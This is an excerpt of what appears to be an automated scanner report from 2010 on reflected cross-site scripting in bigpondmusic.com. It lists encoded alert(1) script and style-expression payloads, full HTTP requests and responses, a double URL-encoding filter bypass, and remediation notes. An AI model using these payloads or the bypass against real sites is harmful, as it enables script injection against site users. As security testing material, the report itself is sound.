GET /news1a4b3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e914b3f2cd5a/article/5080/wavves-arrested-on-marijuana-charges HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88672
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35399'%3b6d81c4247e2 was submitted in the REST URL parameter 1. This input was echoed as 35399';6d81c4247e2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news35399'%3b6d81c4247e2/article/5080/wavves-arrested-on-marijuana-charges HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87861
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db16%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2dd4865812 was submitted in the REST URL parameter 2. This input was echoed as 4db16"><script>alert(1)</script>f2dd4865812 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article4db16%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2dd4865812/5080/wavves-arrested-on-marijuana-charges HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fff5f'%3b1b65fff739f was submitted in the REST URL parameter 2. This input was echoed as fff5f';1b65fff739f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/articlefff5f'%3b1b65fff739f/5080/wavves-arrested-on-marijuana-charges HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88025
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9144%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1791b1e334c was submitted in the REST URL parameter 4. This input was echoed as b9144"><script>alert(1)</script>1791b1e334c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5080/wavves-arrested-on-marijuana-chargesb9144%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1791b1e334c HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 104831
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a655%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a8860a0f366 was submitted in the REST URL parameter 4. This input was echoed as 4a655'style='x:expression(alert(1))'a8860a0f366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5080/wavves-arrested-on-marijuana-charges4a655%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a8860a0f366 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 104615
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Wavves arrested on marijuana ...[SNIP]... <link rel='canonical' href='http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges4a655'style='x:expression(alert(1))'a8860a0f366' /> ...[SNIP]...
2.369. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc83"style%3d"x%3aexpression(alert(1))"96682312f66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cc83"style="x:expression(alert(1))"96682312f66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5080/wavves-arrested-on-marijuana-charges?8cc83"style%3d"x%3aexpression(alert(1))"96682312f66=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 104502
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2742c'%3b5518d4ea8c was submitted in the REST URL parameter 1. This input was echoed as 2742c';5518d4ea8c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2742c'%3b5518d4ea8c/article/5081/lykke-li-gets-ready-for-wounded-rhymes HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88562
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b41e231f03 was submitted in the REST URL parameter 1. This input was echoed as a9d2d"><script>alert(1)</script>6b41e231f03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /newsa9d2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6b41e231f03/article/5081/lykke-li-gets-ready-for-wounded-rhymes HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88065
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1573'%3bb4178195f66 was submitted in the REST URL parameter 2. This input was echoed as c1573';b4178195f66 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/articlec1573'%3bb4178195f66/5081/lykke-li-gets-ready-for-wounded-rhymes HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87881
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c725e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40e60e54ffc was submitted in the REST URL parameter 2. This input was echoed as c725e"><script>alert(1)</script>40e60e54ffc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/articlec725e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40e60e54ffc/5081/lykke-li-gets-ready-for-wounded-rhymes HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88306
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ccd235c3f was submitted in the REST URL parameter 4. This input was echoed as 64d5f"><script>alert(1)</script>57ccd235c3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes64d5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ccd235c3f HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:16:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 168289
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Lykke Li gets ready for Woun ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes64d5f"><script>alert(1)</script>57ccd235c3f" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2c29c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252772376223bf was submitted in the REST URL parameter 4. This input was echoed as 2c29c'style='x:expression(alert(1))'72376223bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes2c29c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252772376223bf HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:16:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 168062
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Lykke Li gets ready for Woun ...[SNIP]... <link rel='canonical' href='http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes2c29c'style='x:expression(alert(1))'72376223bf' /> ...[SNIP]...
2.376. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc03d"style%3d"x%3aexpression(alert(1))"869a944c8ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cc03d"style="x:expression(alert(1))"869a944c8ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5081/lykke-li-gets-ready-for-wounded-rhymes?cc03d"style%3d"x%3aexpression(alert(1))"869a944c8ad=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 168029
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Lykke Li gets ready for Woun ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes?cc03d"style="x:expression(alert(1))"869a944c8ad=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d27c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17f3fae913f was submitted in the REST URL parameter 1. This input was echoed as 5d27c"><script>alert(1)</script>17f3fae913f in the application's response.
